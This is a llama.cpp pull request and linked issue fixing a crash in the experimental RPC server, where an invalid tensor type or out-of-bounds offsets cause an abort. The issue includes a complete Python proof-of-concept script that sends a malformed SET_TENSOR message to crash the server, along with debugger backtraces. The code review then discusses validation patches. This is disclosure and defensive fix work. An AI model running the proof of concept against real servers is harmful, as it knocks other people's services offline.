### PR TITLE
fix(rpc): Improve input validation and error handling

### LINKED ISSUE #13067: Misc. bug: RPC server crash on `SET_TENSOR` with invalid `ggml_type`
### Name and Version

```
$ llama-cli --version
register_backend: registered backend Metal (1 devices)
register_device: registered device Metal (Apple M1 Pro)
register_backend: registered backend BLAS (1 devices)
register_device: registered device BLAS (Accelerate)
register_backend: registered backend RPC (0 devices)
register_backend: registered backend CPU (1 devices)
register_device: registered device CPU (Apple M1 Pro)
version: 5169 (6cf3a31e)
built with Apple clang version 17.0.0 (clang-1700.0.13.3) for arm64-apple-darwin24.4.0
```

### Operating systems

Mac

### Which llama.cpp modules do you know to be affected?

Other (Please specify in the next section)

### Command line

```shell
./build/bin/rpc-server -p 50052
```

### Description

**NOTE:** This was originally reported as a security advisory. After discussing with the maintainers this has now been disclosed as a public issue, since the RPC server is still an experimental feature (see [RPC example](https://github.com/ggml-org/llama.cpp/tree/master/examples/rpc)).

The `rpc-server` crashes when processing an `RPC_CMD_SET_TENSOR` command if the provided data contains an invalid `ggml_type` value within the `rpc_tensor` structure. The server doesn't validate the `type` field read from the network before using it internally. This leads to a failed assertion (`GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT)`) during tensor deserialization (likely in `ggml_new_tensor_4d`), causing the server process to `abort()`.

### Expected Behavior

The server should validate the `ggml_type` read from the `SET_TENSOR` data *before* passing it to GGML functions. If the type is invalid, the server should:
*   Log an error message indicating invalid input.
*   Reject the command (e.g., send an error response or simply close the connection).
*   Continue running without crashing.

### Actual Behavior

The server reads the invalid `ggml_type` (e.g., 65 if the payload starts with 'A' bytes) and uses it internally. A `GGML_ASSERT` checking the type validity fails, causing the server process to terminate via `abort()`. The client typically sees the connection break unexpectedly.

### Steps to Reproduce

1.  Clone the repository: `git clone git@github.com:ggml-org/llama.cpp.git && cd llama.cpp`
2.  Build the `rpc-server` binary: `cmake -B build . -DGGML_RPC=ON && cd build && cmake --build . --config Release --target rpc-server`
3.  Run the server from the `build` directory: `./bin/rpc-server -p 50052`
4.  Run the Python Proof of Concept script below (save as `poc_rpc_crash.py`): `python poc_rpc_crash.py`

```python
import socket
import struct
import sys
import time

# Server details (change if needed)
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 50052

# GGML RPC Commands (enum rpc_cmd)
RPC_CMD_SET_TENSOR = 6
RPC_CMD_HELLO = 14

# Size definitions
PAYLOAD_DATA_SIZE = 1 * 1024 # 1 KB of 'A's
INTERNAL_SIZE_FIELD_VAL = PAYLOAD_DATA_SIZE # Value for the internal size field
CHUNK_SIZE = 1024 # Send data in 1KB chunks

# --- Helper Functions ---

def p8(value):
    """Packs an integer into a 1-byte byte string (unsigned char)."""
    return struct.pack('<B', value)

def p64(value):
    """Packs an integer into an 8-byte byte string (unsigned long long)."""
    return struct.pack('<Q', value)

def u64(value_bytes):
    """Unpacks an 8-byte byte string into an integer (unsigned long long)."""
    return struct.unpack('<Q', value_bytes)[0]

def recv_exact(sock, num_bytes):
    """Receives exactly num_bytes from the socket."""
    data = b''
    start_time = time.time()
    # Use socket timeout if set
    timeout = sock.gettimeout()

    while len(data) < num_bytes:
        try:
            # Check for timeout if applicable
            if timeout and (time.time() - start_time > timeout):
                print(f"[-] Socket timeout after {timeout}s waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
                return None
            # Calculate remaining bytes, request at most CHUNK_SIZE
            remaining = num_bytes - len(data)
            chunk = sock.recv(min(remaining, CHUNK_SIZE))
            if not chunk:
                # Connection closed prematurely
                print(f"[-] Connection closed by peer while trying to receive {num_bytes} bytes (got {len(data)})", file=sys.stderr)
                return None
            data += chunk
        except socket.timeout:
            print(f"[-] Socket timeout explicitly caught waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
            return None
        except OSError as e:
            print(f"[-] Socket error during recv_exact: {e}", file=sys.stderr)
            return None
    return data

def send_all(sock, data):
    """Sends all data reliably."""
    try:
        sock.sendall(data)
        return True
    except OSError as e:
        print(f"[-] Socket error during send_all: {e}", file=sys.stderr)
        return False

def send_data_chunks_native(sock, size):
    """Sends 'size' bytes of 'A' in chunks using standard sockets."""
    bytes_sent = 0
    num_chunks = (size + CHUNK_SIZE - 1) // CHUNK_SIZE
    for i in range(num_chunks):
        current_chunk_size = min(CHUNK_SIZE, size - bytes_sent)
        chunk = b'A' * current_chunk_size
        if not send_all(sock, chunk):
            print(f"[-] Failed to send chunk {i+1}", file=sys.stderr)
            return False
        bytes_sent += current_chunk_size
    return True

# --- Main Logic ---

def run_exploit_native(host, port):
    print(f"[*] Connecting to {host}:{port}...")
    sock = None
    try:
        # Set a connection timeout
        sock = socket.create_connection((host, port), timeout=10)
        print("[+] Connected.")
        # Set a timeout for subsequent socket operations
        sock.settimeout(15)

        print("[*] Performing HELLO handshake...")
        hello_cmd = p8(RPC_CMD_HELLO)
        hello_input_size = p64(0)
        hello_packet = hello_cmd + hello_input_size
        if not send_all(sock, hello_packet): raise ConnectionError("Failed to send HELLO packet")

        hello_resp_size_bytes = recv_exact(sock, 8)
        if not hello_resp_size_bytes: raise ConnectionError("Server closed during HELLO response size read")
        hello_resp_size = u64(hello_resp_size_bytes)

        # Expecting 3 bytes: major, minor, patch version
        if hello_resp_size < 3:
            # Allow for potential future expansion, but need at least 3 for version
            print(f"[!] Warning: Unexpected HELLO response size: {hello_resp_size}. Expected >= 3.")
            # Attempt to read anyway if size > 0
            if hello_resp_size == 0:
                 raise ValueError("HELLO response size is zero.")

        hello_resp_data = recv_exact(sock, hello_resp_size)
        if not hello_resp_data or len(hello_resp_data) < 3:
            raise ConnectionError("Incomplete HELLO response data received")
        print(f"[+] HELLO ok (v{hello_resp_data[0]}.{hello_resp_data[1]}.{hello_resp_data[2]}) Received {len(hello_resp_data)} bytes total.")

        print("[*] Attempting crash via SET_TENSOR with invalid type in 1KB payload...")
        cmd = p8(RPC_CMD_SET_TENSOR)

        # This is the size field read by recv_msg to determine buffer size
        internal_size_field = p64(INTERNAL_SIZE_FIELD_VAL)

        # This is the 'total payload size' field sent after the command byte.
        # It should reflect the size of data *following* this field.
        # In this case, it's the internal_size_field (8 bytes) + the actual garbage data (PAYLOAD_DATA_SIZE bytes)
        actual_payload_size_val = 8 + PAYLOAD_DATA_SIZE
        actual_payload_size_field = p64(actual_payload_size_val)

        # Header: command_byte (1) + actual_payload_size (8) + internal_size_field (8)
        fixed_header = cmd + actual_payload_size_field + internal_size_field
        print(f"[*] Sending header (Cmd: {RPC_CMD_SET_TENSOR}, TotalPayloadSize: {actual_payload_size_val}, InternalResizeField: {u64(internal_size_field):#x}) -> {len(fixed_header)} bytes")

        if not send_all(sock, fixed_header):
            raise ConnectionError("Failed to send fixed header")

        # Send the 1KB garbage data ('A' * 1024)
        print(f"[*] Sending {PAYLOAD_DATA_SIZE} bytes of garbage data ('A' * {PAYLOAD_DATA_SIZE})...")
        if not send_data_chunks_native(sock, PAYLOAD_DATA_SIZE):
             raise ConnectionError("Failed during data chunk send")
        print(f"[+] Header and {PAYLOAD_DATA_SIZE} bytes of data sent.")

        # Expect the server to crash after receiving data and trying to process it
        print("[*] Waiting for server disconnect (expecting crash after processing header)...")
        # Try receiving a small amount of data. An empty read means disconnected (crashed).
        # Using a longer timeout here as processing might take a moment before crash
        sock.settimeout(10)
        recv_data = None
        try:
            recv_data = sock.recv(1024)
        except socket.timeout:
            # This could happen if the server hangs instead of crashing, less likely for this specific bug
            print("[-] Timeout waiting for server disconnect. Server might be hung?")
            # Still consider it potentially successful if timeout occurs after sending bad data
            print("[?] Vulnerability might still be triggered if server is unresponsive.")
            return # Exit gracefully
        except OSError as e:
             # Connection reset/broken pipe often indicates server crash
            print(f"[+] Socket error likely indicating server crash: {e}. Vulnerability Confirmed.")
            return # Exit gracefully

        if recv_data:
            print(f"[-] Received unexpected data ({len(recv_data)} bytes): {recv_data[:64]}... Server might not have crashed.")
        else:
            # recv() returning 0 bytes means the other side closed the connection cleanly.
            print("[+] Connection closed by server (received 0 bytes - likely crashed due to assertion failure). Vulnerability Confirmed.")

    except ConnectionRefusedError:
        print(f"[-] Connection refused by {host}:{port}. Is the server running?", file=sys.stderr)
    except socket.timeout:
         print("[-] Timeout during connection or initial handshake. Check server state.", file=sys.stderr)
    except (ConnectionError, ValueError, OSError, struct.error) as e:
        print(f"[-] An error occurred: {e}", file=sys.stderr)
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}", file=sys.stderr)
        import traceback
        traceback.print_exc()
    finally:
        if sock:
            sock.close()
            print("[*] Connection closed.")

if __name__ == "__main__":
    target_host = DEFAULT_HOST
    target_port = DEFAULT_PORT
    if len(sys.argv) > 1:
        target_host = sys.argv[1]
    if len(sys.argv) > 2:
        try:
            target_port = int(sys.argv[2])
        except ValueError:
            print(f"[-] Invalid port: {sys.argv[2]}", file=sys.stderr)
            sys.exit(1)

    run_exploit_native(target_host, target_port)
```

Debugger backtrace to confirm crash: 

```
* thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
  * frame #0: 0x0000000199164388 libsystem_kernel.dylib`__pthread_kill + 8
    frame #1: 0x000000019919d88c libsystem_pthread.dylib`pthread_kill + 296
    frame #2: 0x00000001990a6c60 libsystem_c.dylib`abort + 124
    frame #3: 0x000000010032d31c libggml-base.dylib`ggml_abort + 116
    frame #4: 0x000000010032eb54 libggml-base.dylib`ggml_new_tensor_impl + 824
    frame #5: 0x000000010032ed08 libggml-base.dylib`ggml_new_tensor_4d + 56
    frame #6: 0x000000010005ed18 libggml-rpc.dylib`rpc_server::deserialize_tensor(ggml_context*, rpc_tensor const*) + 56
    frame #7: 0x000000010005f208 libggml-rpc.dylib`rpc_server::set_tensor(std::__1::vector<unsigned char, std::__1::allocator<unsigned char>> const&) + 136
    frame #8: 0x00000001000610ac libggml-rpc.dylib`ggml_backend_rpc_start_server + 2008
    frame #9: 0x0000000100003214 rpc-server`main + 3012
    frame #10: 0x0000000198dfeb4c dyld`start + 6000
```

### First Bad Commit

https://github.com/ggml-org/llama.cpp/commit/5e31828d3e35c76ecfee665bc23771a4bec1d130

### Relevant log output

```shell
Starting RPC server v1.0.0
  endpoint       : 127.0.0.1:50052
  local cache    : n/a
  backend memory : 16384 MB
Accepted client connection, free_mem=17179869184, total_mem=17179869184
/Users/ville/git/llama.cpp/ggml/src/ggml.c:1568: GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT) failed
[1]    61001 abort      ./bin/rpc-server
```

### PR DESCRIPTION
**Pull request by thevilledev**
Fixes #13067 

The `rpc-server` was vulnerable to Denial of Service attacks via several RPC commands (`SET_TENSOR`, `GRAPH_COMPUTE`, etc.). Malformed messages could trigger failed assertions (e.g., invalid `ggml_type`) or out-of-bounds reads/writes leading to `GGML_ABORT` calls, crashing the server process.

This PR introduces robust input validation and replaces `abort()` calls with graceful error handling:

- **Type Validation:** `deserialize_tensor` now checks if the `tensor->type` is within the valid `GGML_TYPE_COUNT` range *before* calling `ggml_new_tensor_4d`. Returns `nullptr` on invalid type.
- **Bounds Checks:** Replaced `GGML_ABORT` in `set_tensor`, `set_tensor_hash`, and `get_tensor` handlers with error logging and returning `false` when data/offset parameters are out of buffer bounds.
- **Error Propagation:**
    - `create_node` now checks for `nullptr` return values from `deserialize_tensor` and its recursive calls, propagating `nullptr` upwards on failure. Uses `find` instead of `at` for safer map access.
    - `copy_tensor` now checks for `nullptr` from `deserialize_tensor` and sets the response status to failure if deserialization or bounds checks fail.
    - `graph_compute` now checks for `nullptr` return from `create_node` and returns failure status correctly. The final return value now reflects the actual computation status.
    - `RPC_CMD_GET_ALLOC_SIZE` now checks the return value of `server.get_alloc_size` in the RPC server
    loop. If the call fails, return early to close the connection.

### CODE REVIEW

File: ggml/src/ggml-rpc/ggml-rpc.cpp [hunk 1]
```diff
@@ -1234,43 +1259,118 @@ ggml_tensor * rpc_server::create_node(uint64_t id,
...
-    if (input.size() < sizeof(uint32_t) + n_nodes*sizeof(uint64_t) + sizeof(uint32_t)) {
+
+    // Calculate required size for nodes array
+    size_t nodes_array_bytes = n_nodes * sizeof(uint64_t);
+
+    // Calculate required size up to n_tensors field safely
+    size_t required_size_before_tensors = min_header_size;
+
+    // Check for overflow before adding nodes_array_bytes
+    if (SIZE_MAX - required_size_before_tensors < nodes_array_bytes) {
```
Comment (rgerganov) [inline ggml/src/ggml-rpc/ggml-rpc.cpp:1318]: I don't quite understand the new checks which are being added; could you please provide an example where the existing checks fail to detect invalid input?

File: ggml/src/ggml-rpc/ggml-rpc.cpp [hunk 2]
```diff
@@ -1286,12 +1386,20 @@ bool rpc_server::graph_compute(const std::vector<uint8_t> & input, rpc_msg_graph
...
+            response.result = GGML_STATUS_FAILED;
+            // No need to free ctx, ggml_context_ptr handles it.
+            return false;
+        }
     }
     ggml_status status = ggml_backend_graph_compute(backend, graph);
     response.result = status;
-    return true;
+    // Return true only if computation succeeded
+    return status == GGML_STATUS_SUCCESS;
```
Comment (rgerganov) [inline ggml/src/ggml-rpc/ggml-rpc.cpp:1402]: The result of the computation is set in the `response`; here we return `true` because the input is valid

File: ggml/src/ggml-rpc/ggml-rpc.cpp (hunk 1 above)
Comment (thevilledev) [reply ggml/src/ggml-rpc/ggml-rpc.cpp:1323]: So from the old implementation:

- Read `n_nodes`
- Calculate offset `O1 = sizeof(uint32_t) + n_nodes * sizeof(uint64_t)`
- Read `n_tensors` from `input.data() + O1`
- Calculate offset `O2 = O1 + sizeof(uint32_t) + n_tensors * sizeof(rpc_tensor)`
- Read tensors array from `input.data() + O1 + sizeof(uint32_t)`

A large `n_nodes` value  combined with a small `input.size()` would read beyond the actual input buffer.

I'll try to summarise the new approach:

- Reads `n_nodes`
- Calculates `nodes_array_bytes = n_nodes * sizeof(uint64_t)`
- Calculates `required_size_before_tensors = min_header_size + nodes_array_bytes + n_tensors_field_size`
  - With overflow checks for the additions, although overflow is _very_ unlikely
- Crucially: Checks `if (input.size() < required_size_before_tensors)` before attempting to read `n_tensors`
  -  This prevents the out-of-bounds read when trying to access `n_tensors` if `n_nodes` was large.
- Reads `n_tensors`
- Calculates `tensors_array_bytes = n_tensors * sizeof(rpc_tensor)`
- Calculates `required_total_size = required_size_before_tensors + tensors_array_bytes`
    - With overflow check
- Checks `if (input.size() < required_total_size)` before attempting to access the tensors data.

This is quite extensive and might be overly cautious, but happy to hear alternatives!

File: ggml/src/ggml-rpc/ggml-rpc.cpp [hunk 3]
```diff
@@ -1234,43 +1259,118 @@ ggml_tensor * rpc_server::create_node(uint64_t id,
     if (tensor_map.find(id) != tensor_map.end()) {
         return tensor_map[id];
     }
-    const rpc_tensor * tensor = tensor_ptrs.at(id);
+    // Safely find the tensor pointer
+    auto it_ptr = tensor_ptrs.find(id);
+    if (it_ptr == tensor_ptrs.end()) {
+        GGML_LOG_ERROR("[%s] tensor id %" PRIu64 " not found in provided tensors\n", __func__, id);
+        return nullptr;
```
[the remark this answers is not in the document]
Comment (thevilledev) [reply ggml/src/ggml-rpc/ggml-rpc.cpp:1260]: Fair point! I have an alternative in mind (which I'll push in a moment):

- `graph_compute` checks if the input 'id' was non-zero when `create_node` returns nullptr. Hopefully identifies failures versus intentional null links.
- `create_node` avoids recursive calls for zero IDs and propagates nullptr unambiguously on failure during recursion.

File: ggml/src/ggml-rpc/ggml-rpc.cpp [hunk 4]
```diff
@@ -1034,7 +1047,10 @@ bool rpc_server::set_tensor(const std::vector<uint8_t> & input) {
         const size_t p1 = p0 + ggml_backend_buffer_get_size(tensor->buffer);
 
         if (in_tensor->data + offset < p0 || in_tensor->data + offset >= p1 || size > (p1 - in_tensor->data - offset)) {
-            GGML_ABORT("[%s] tensor->data out of bounds\n", __func__);
+            // Replace GGML_ABORT with logging and error return
```
[the remark this answers is not in the document]
Comment (thevilledev) [reply ggml/src/ggml-rpc/ggml-rpc.cpp]: Will do!

File: ggml/src/ggml-rpc/ggml-rpc.cpp [hunk 5]
```diff
@@ -1109,7 +1125,11 @@ bool rpc_server::set_tensor_hash(const std::vector<uint8_t> & input, rpc_msg_set
...
```
[the remark this answers is not in the document]
Comment (thevilledev) [reply ggml/src/ggml-rpc/ggml-rpc.cpp]: Will do!

File: ggml/src/ggml-rpc/ggml-rpc.cpp [hunk 6]
```diff
@@ -1109,7 +1125,11 @@ bool rpc_server::set_tensor_hash(const std::vector<uint8_t> & input, rpc_msg_set
...
+            GGML_LOG_ERROR("[%s] tensor data region (data=0x%" PRIx64 ", offset=%" PRIu64 ", size=%zu, hash=0x%" PRIx64 ") out of buffer bounds [0x%zx, 0x%zx)\n",
+                           __func__, in_tensor->data, offset, size, *hash, p0, p1);
+            response.result = 0;
```
[the remark this answers is not in the document]
Comment (thevilledev) [reply ggml/src/ggml-rpc/ggml-rpc.cpp]: I missed this, will remove!

File: ggml/src/ggml-rpc/ggml-rpc.cpp [hunk 7]
```diff
@@ -1174,7 +1194,10 @@ bool rpc_server::get_tensor(const rpc_msg_get_tensor_req & request, std::vector<
         if (request.tensor.data + request.offset < p0 ||
             request.tensor.data + request.offset >= p1 ||
             request.size > (p1 - request.tensor.data - request.offset)) {
-                GGML_ABORT("[%s] tensor->data out of bounds\n", __func__);
+                // Replace GGML_ABORT with logging and error return
```
[the remark this answers is not in the document]
Comment (thevilledev) [reply ggml/src/ggml-rpc/ggml-rpc.cpp]: Will do!

File: ggml/src/ggml-rpc/ggml-rpc.cpp [hunk 8]
```diff
@@ -1197,6 +1220,7 @@ bool rpc_server::copy_tensor(const rpc_msg_copy_tensor_req & request, rpc_msg_co
     ggml_tensor * dst = deserialize_tensor(ctx, &request.dst);
     if (src == nullptr || dst == nullptr) {
         GGML_LOG_ERROR("[%s] error deserializing tensors\n", __func__);
+        response.result = 0;
```
[the remark this answers is not in the document]
Comment (thevilledev) [reply ggml/src/ggml-rpc/ggml-rpc.cpp]: Will do!

File: ggml/src/ggml-rpc/ggml-rpc.cpp [hunk 9]
```diff
@@ -1214,6 +1238,7 @@ bool rpc_server::copy_tensor(const rpc_msg_copy_tensor_req & request, rpc_msg_co
                          dst_data + src_size,
                          dst_base,
                          dst_base + dst_buf_sz);
+        response.result = 0;
```
[the remark this answers is not in the document]
Comment (thevilledev) [reply ggml/src/ggml-rpc/ggml-rpc.cpp]: Will do!

File: ggml/src/ggml-rpc/ggml-rpc.cpp (hunk 2 above)
Comment (thevilledev) [reply ggml/src/ggml-rpc/ggml-rpc.cpp]: Fair point, will change it back to the original

**Comment by thevilledev** [comment]
> on my opinion it may affects to perfomance, may be use feature flag (via cmake)?

I believe it would be interesting to see what the performance impact of this change is. I'm new to the project so pointers welcome if there's a test suite available which would show that.

Slightly off-topic but related: I think there's plenty of opportunities for similar improvements in the RPC server. From invalid tensor operations to crashing via deep recursion in `create_node` which I would like to also fix. I'd like to work on those one change at a time though.

File: ggml/src/ggml-rpc/ggml-rpc.cpp (hunk 3 above)
[the remark this answers is not in the document]
Comment (rgerganov) [reply ggml/src/ggml-rpc/ggml-rpc.cpp:1260]: you should also remove the zero check at the beginning of the function

File: ggml/src/ggml-rpc/ggml-rpc.cpp (hunk 1 above)
Comment (rgerganov) [reply ggml/src/ggml-rpc/ggml-rpc.cpp:1323]: > A large `n_nodes` value combined with a small `input.size()` would read beyond the actual input buffer.

No, it won't. We check for this at line 1265

**Comment by slaren** [comment]
`RPC_CMD_GET_ALLOC_SIZE` does not check for errors, and if the call to `get_alloc_size` fails it will leave the client connected in a bad state:
https://github.com/ggml-org/llama.cpp/blob/604f0a0045ecb1988a32dbdad7ba4984df9c7ecd/ggml/src/ggml-rpc/ggml-rpc.cpp#L1470

File: ggml/src/ggml-rpc/ggml-rpc.cpp (hunk 1 above)
Comment (thevilledev) [reply ggml/src/ggml-rpc/ggml-rpc.cpp:1323]: Apologies, I think I misunderstood. The only difference then left is the overflow checks. While defensive, unlikely to overflow on a 64-bit system. What do you think, are these still worth having?

File: ggml/src/ggml-rpc/ggml-rpc.cpp (hunk 3 above)
[the remark this answers is not in the document]
Comment (thevilledev) [reply ggml/src/ggml-rpc/ggml-rpc.cpp:1256]: Done, removed noisy logging while at it

**Comment by thevilledev** [comment]
> The best investment of efforts in this direction would be creating a script/job for coverage guided fuzzing.

Sounds good, I can look into that after this PR 👍

File: ggml/src/ggml-rpc/ggml-rpc.cpp (hunk 1 above)
Comment (rgerganov) [reply ggml/src/ggml-rpc/ggml-rpc.cpp:1319]: The memory is already allocated in the `input` vector, we are just parsing here. I believe we already have the necessary checks.

Comment (thevilledev) [reply ggml/src/ggml-rpc/ggml-rpc.cpp]: Alright, reverted to the original approach

File: ggml/src/ggml-rpc/ggml-rpc.cpp [hunk 10]
```diff
@@ -1297,6 +1345,15 @@ bool rpc_server::graph_compute(const std::vector<uint8_t> & input, rpc_msg_graph
         int64_t id;
         memcpy(&id, &nodes[i], sizeof(id));
         graph->nodes[i] = create_node(id, ctx, tensor_ptrs, tensor_map);
+
+        // Check if create_node failed for a *non-zero* ID.
+        // If id was 0, create_node returning nullptr is expected.
+        // If id was non-zero and create_node returned nullptr, it indicates a deserialization error.
+        if (graph->nodes[i] == nullptr && id != 0) {
+            GGML_LOG_ERROR("[%s] failed to create graph node %d (id=%" PRId64 ")\n", __func__, i, id);
+            response.result = GGML_STATUS_FAILED;
```
Comment (rgerganov) [inline ggml/src/ggml-rpc/ggml-rpc.cpp:1354]: this is not needed

Comment (thevilledev) [reply ggml/src/ggml-rpc/ggml-rpc.cpp:1354]: I have a very specific test payload which hits this issue. It uses deeply nested graphs. If I remove the check then the chosen backend gets a null pointer and crashes. I've only tested this on the Metal backend though. Basically this check avoids a secondary crash later in the process.

Here's the backtrace:

```
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x98)
    frame #0: 0x0000000100218524 libggml-metal.dylib`ggml_metal_encode_node + 96
libggml-metal.dylib`ggml_metal_encode_node:
->  0x100218524 <+96>:  ldp    x26, x21, [x0, #0x98]
    0x100218528 <+100>: ldr    x19, [x0, #0xa8]
    0x10021852c <+104>: bl     0x10021f834    ; symbol stub for: ggml_is_empty
    0x100218530 <+108>: tbnz   w0, #0x0, 0x100218548 ; <+132>
Target 0: (rpc-server) stopped.
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x98)
  * frame #0: 0x0000000100218524 libggml-metal.dylib`ggml_metal_encode_node + 96
    frame #1: 0x0000000100218458 libggml-metal.dylib`__ggml_backend_metal_set_n_cb_block_invoke + 576
    frame #2: 0x0000000100217f04 libggml-metal.dylib`ggml_backend_metal_graph_compute + 368
    frame #3: 0x0000000100344a20 libggml-base.dylib`ggml_backend_graph_compute + 24
    frame #4: 0x0000000100064858 libggml-rpc.dylib`rpc_server::graph_compute(std::__1::vector<unsigned char, std::__1::allocator<unsigned char>> const&, rpc_msg_graph_compute_rsp&) + 380
    frame #5: 0x0000000100065100 libggml-rpc.dylib`ggml_backend_rpc_start_server + 1648
    frame #6: 0x0000000100003334 rpc-server`main + 3300
    frame #7: 0x0000000198dfeb4c dyld`start + 6000
```

Comment (rgerganov) [reply ggml/src/ggml-rpc/ggml-rpc.cpp:1354]: I meant that only `response.result = GGML_STATUS_FAILED` is not needed, not the entire check

**Review by rgerganov — APPROVED** [review]
This looks fine to me now, thanks for addressing my comments. I also did some tests and didn't find performance or functional regressions.

@slaren could you please review as well?

File: ggml/src/ggml-rpc/ggml-rpc.cpp [hunk 11]
```diff
@@ -982,8 +982,21 @@ bool rpc_server::buffer_clear(const rpc_msg_buffer_clear_req & request) {
...
+    // Validate tensor type before using it
+    if (tensor->type >= GGML_TYPE_COUNT) {
+        GGML_LOG_ERROR("[%s] invalid tensor type received: %u\n", __func__, tensor->type);
+        return nullptr;
+    }
+
     ggml_tensor * result = ggml_new_tensor_4d(ctx, (ggml_type) tensor->type,
         tensor->ne[0], tensor->ne[1], tensor->ne[2], tensor->ne[3]);
+
+    // ggml_new_tensor_4d might fail if dimensions are invalid, although less likely to crash than invalid type
```
Comment (slaren) [inline ggml/src/ggml-rpc/ggml-rpc.cpp:994]: If `ggml_new_tensor` fails it will crash, it will not return `NULL`. The check is still good for future-proofing, but the comment is misleading.

**Review by slaren — APPROVED** [review]
